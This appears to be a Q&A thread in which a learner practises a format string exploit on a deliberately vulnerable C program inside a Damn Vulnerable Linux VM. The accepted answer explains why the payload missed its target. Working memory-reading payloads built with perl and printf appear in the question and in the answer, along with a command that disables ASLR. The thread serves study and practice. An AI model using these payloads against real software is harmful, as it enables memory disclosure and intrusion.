# Format String Vulnerability exercise

Tags: c, linux, security, exploit

I'm trying to exploit a format string vulnerability just for exercise but something is going wrong. My goal is to exploit such a bug in order to read from a certain address chosen by me.

This is the code I'm trying to exploit:

```
#include <stdio.h>
void main(int argv, char *argv[]){
  printf(argv[1]);
}
```

This program is running on a x86 machine mounting a 2.6.20 linux kernel.

I'm tring to print the bytes stored at the address 0x80483cb, which belongs to the code section:

```
 ...
 80483cb:       e8 e8 fe ff ff          call   80482b8 <printf@plt>
 80483cb:       e8 e8 fe ff ff          call   80482b8 <printf@plt>
 80483d0:       83 c4 10                add    $0x10,%esp
 80483d3:       b8 00 00 00 00          mov    $0x0,%eax
 ...
```

Just to be sure I've also disabled the ASLR with:

```
echo 0 > /proc/sys/kernel/randomize_va_space
```

I've found the exact location where to store the memory address doing:

```
./print AAAA`perl -e 'print "%08x."x141'`
AAAA00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.
bffff108.b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.
bffff0b0.b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.
b7ff66b0.b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.
08048440.b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2ac.bffff2b4.00000000.bffff57a.bffff5dd.
bffff5f1.bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.
bffff711.bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.
bffffce7.bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.
bfffff0a.bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.
bfffffb7.bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.
078bfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.
00000007.00000007.b7fea000.00000008.00000000.00000009.080482d0.0000000b.00000000.0000000c.
00000000.0000000d.00000000.0000000e.00000000.00000017.00000000.0000000f.bffff29b.00000000.
00000000.00000000.00000000.00000000.69000000.00363836.00000000.00000000.00000000.72702f2e.
00746e69.41414141.
```

Finally I tried to print the above bytes doing:

```
./print $(printf "\xcb\x83\x04\x08")`perl -e 'print "%08x."x140 . "%s"'`
```

But what I got is a fault before to be able to see those bytes:

```
00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.bffff108.
b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.bffff0b0.
b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.b7ff66b0.
b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.08048440.
b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2af.bffff2b7.00000000.bffff57a.bffff5dd.bffff5f1.
bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.bffff711.
bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.bffffce7.
bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.bfffff0a.
bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.bfffffb7.
bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.078bfbff.
00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.
00000007.b7fea000.00000008.000Segmentationfault
```

What I expected was to get on screen a set of chars which are the bytes from the address used until the first \x00, What am I doing wrong?

Answer (score 1, accepted):

This would work if you wouldn't change the length of your argument.

You remove one `%08x.` and add one `%s`. This makes your input 3 bytes shorter, effectively changing the stack layout. So you are likely not hitting the right address anymore.

I recommend writing a small script that will always pad your string to a fixed size. This helps to avoid such changes.

Keep in mind that changing your environment ($PWD (cd ..), adding/removing environment variables, etc.)  will also change the stack layout. Resetting the environment can be of help here (`env -i`).

Here is a run of the vuln program without changing the length of the argument:

> $ ./nagga $(printf "\x41\x41\x41\x41")XX`perl -e 'print "%x."x118 . "%x"';`
>   AAAAXX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.c1a6169f.f6a2b28f.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f4000000.2b137f67.69b01f05.93944d19.697a2611.363836.0.616e2f2e.616767.41414141
>
> $ ./nagga $(printf "\x70\x84\x04\x08")XX`perl -e 'print "%x."x118 . "%s"';`
>   p�XX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.187cff94.2f785b84.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f000000.5f19366a.9135f3e8.e60e0ac6.69afc87d.363836.0.616e2f2e.616767.�Ë$Ð���������U��S�������t��f����Ћ���u���[]Ð�S��r

Works as expected.

Comment: I tryed it on a ubuntu 12.04.04 LTS VM. ASLR disabled (which should not matter here). Your first command produces a 709 bytes long string: `echo -n AAAA`perl -e 'print "%08x."x141'` | wc -c`. Your second command produces 707 bytes: `echo -n $(printf "\xcb\x83\x04\x08") `perl -e 'print "%08x."x140 . "%s"';`   | wc -c `. Try to make both commands exactly the same length and it should work.

Comment: Thanks for the answer. I tried what you suggested (use directly %x instead of %08x) and it works! I'd like to understand though, why my solution shouldn't work? I understand that %08x. is 3 bytes more than %s, but as being this ones the last bytes pushed in the stack (higher addresses), they should not mess with the distance between the string pointer and the string itself. And as far as I know, is this one that matters, Am I wrong?

Comment: Sorry I edited the comments in the moment you were replying. Iw works now. the problem was indeed due to those 3 bytes.

Comment: Cool! Might I ask where you are practicing this?

Comment: Sure, on a DVL (damn vulnerable linux) O.S. installed on a virtual machine on my pc.

Comment: ic. Be sure to check out the games at overthewire.org and smashthestack.org :) join the irc there too, if you like!